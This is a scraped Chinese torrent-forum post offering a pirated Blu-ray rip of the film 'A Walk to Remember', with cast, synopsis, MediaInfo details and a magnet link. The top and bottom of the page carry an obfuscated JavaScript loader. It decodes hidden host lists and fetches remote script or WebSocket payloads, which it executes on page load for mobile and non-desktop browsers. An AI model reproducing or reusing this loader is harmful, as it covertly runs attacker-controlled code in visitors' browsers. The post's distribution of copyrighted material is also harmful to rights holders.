初恋的回忆[中文字幕].A.Walk.to.Remember.2002.1080p.BluRay.x265.10bit.DTS 7.74GB

版主小s 1月前 253

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 初恋的回忆 / 青涩年代 / 流星初恋 / 漫步回忆 / 留住一片情 / Un amor para recordar

◎片 名 A Walk to Remember

◎年 代 2002

◎产 地 美国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 2002-01-25(美国)

◎IMDb链接 https://www.imdb.com/title/tt0281358/

◎豆瓣评分 7.6/10 (18942人评价)

◎豆瓣链接 https://movie.douban.com/subject/1306213/

◎片 长 101 分钟

◎导 演 亚当·尚克曼 Adam Shankman (id:1036437)

◎编 剧 尼古拉斯·斯帕克斯 Nicholas Sparks (id:1013927)

凯伦·詹森 Karen Janszen (id:1343043)

◎演 员 曼迪·摩尔 Mandy Moore (id:1000013)

夏恩·韦斯特 Shane West (id:1017909)

彼德·考约特 Peter Coyote (id:1027864)

达丽尔·汉纳 Daryl Hannah (id:1036348)

劳伦·日尔曼 Lauren German (id:1036389)

克莱恩·克劳福德 Clayne Crawford (id:1002764)

珍妮·加利 Jenny Gulley (id:1251595)

艾瑞克·史密斯 Erik Smith (id:1274738)

莫文·华伦 Mervyn Warren (id:1033165)

Chip Thomas Chip Thomas (id:1171090)

Charles E. Bailey Charles E. Bailey (id:1166138)

亚当·尚克曼 Adam Shankman (id:1036437)

安妮·弗莱彻 Anne Fletcher (id:1045129)

帕兹·德拉维尔塔 Paz de la Huerta (id:1049647)

Kelly Cole Childers Kelly Cole Childers (id:1074382)

Cassidy Ladden Cassidy Ladden (id:1113041)

Matt Lutz Matt Lutz (id:1119465)

大卫·李·史密斯 David Lee Smith (id:1149041)

丹尼斯·蒂诺威 Denise Di Novi (id:1282363)

莫文·华伦 Mervyn Warren (id:1033165)

Emma E. Hickox Emma E. Hickox (id:1001469)

Barbara Cohen Barbara Cohen (id:1025860)

Mary Gail Artz Mary Gail Artz (id:1050641)

Burton Rencher Burton Rencher (id:1295452)

Jeff Goodwin Jeff Goodwin (id:1099950)

JoJo Guthrie JoJo Guthrie (id:1285670)

Gina Baran Gina Baran (id:1305061)

夏伊娜·霍尔姆斯 Shaina Holmes (id:1197723)

马克·丹菲特 Mark Dornfeld (id:1282612)

◎标 签 爱情 / 美国 / 青春 / 初恋 / 美国电影 / MandyMoore / 电影 / 2002

◎简 介

杰米(曼迪·摩尔 Mandy Moore 饰)是一个学习优秀长相平凡的女生,身为牧师女儿的她信仰坚定,不为人所影响。兰顿(夏恩·韦斯特 Shane West饰)是典型的坏学生,不爱学习,吊儿郎当,瞧不起另类清高的杰米。

因为一个过火的恶作剧,兰顿被罚到附属学校去做家教,并且要在一个舞台剧中扮演谦卑角色,而剧中的女主角正是他甚无好感的杰米。杰米对排练的投入渐渐感染了初到剧团的兰顿,兰顿开始投入角色,并对杰米有了改观。然而自信的杰米竟要兰顿立下约誓言,要他一定不能爱上自己。

排练的日子相处磨合,男生女生间的感情还是悄悄滋长了。然而杰米却无法接受这个事实。面前这个不思进取的坏学生,怎么可能成为自己的恋人……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 156695931003120428805938147969683117047 (0x75E289DF9BF01DD91873E34020AB53F7)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.74 GiB

  8. Duration : 1 h 42 min

  9. Overall bit rate : 10.8 Mb/s

  10. Movie name : A Walk to Remember

  11. Encoded date : UTC 2021-10-24 04:21:26

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 42 min

  23. Bit rate : 8 983 kb/s

  24. Width : 1 920 pixels

  25. Height : 812 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.240

  33. Stream size : 6.43 GiB (83%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=18.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x812 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4353 (0x1101)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 42 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.08 GiB (14%)

  54. Language : English

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4610 (0x1202)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 38 min

  66. Bit rate : 179 kb/s

  67. Count of elements : 6083

  68. Stream size : 126 MiB (2%)

  69. Title : chs&eng

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4611 (0x1203)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 38 min

  82. Bit rate : 180 kb/s

  83. Count of elements : 6083

  84. Stream size : 127 MiB (2%)

  85. Title : cht&eng

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4612 (0x1204)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 38 min

  98. Bit rate : 93.0 kb/s

  99. Count of elements : 6083

  100. Stream size : 65.3 MiB (1%)

  101. Title : chs

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4613 (0x1205)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 38 min

  114. Bit rate : 94.4 kb/s

  115. Count of elements : 6083

  116. Stream size : 66.3 MiB (1%)

  117. Title : cht

  118. Language : Chinese

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Text #5

  123. ID : 7

  124. Format : PGS

  125. Muxing mode : zlib

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 1 h 38 min

  129. Bit rate : 23.1 kb/s

  130. Count of elements : 1622

  131. Stream size : 16.3 MiB (0%)

  132. Title : eng

  133. Language : English

  134. Default : No

  135. Forced : No


  136. Menu

  137. 00:00:00.000 : en:Chapter 01

  138. 00:08:55.952 : en:Chapter 02

  139. 00:15:28.928 : en:Chapter 03

  140. 00:24:35.182 : en:Chapter 04

  141. 00:30:36.209 : en:Chapter 05

  142. 00:36:49.457 : en:Chapter 06

  143. 00:43:52.379 : en:Chapter 07

  144. 00:54:26.096 : en:Chapter 08

  145. 01:04:41.002 : en:Chapter 09

  146. 01:16:26.748 : en:Chapter 10

  147. 01:24:18.386 : en:Chapter 11

  148. 01:37:55.995 : en:Chapter 12


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:D87754B596F682550501041A187ABDD2834D46D9

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};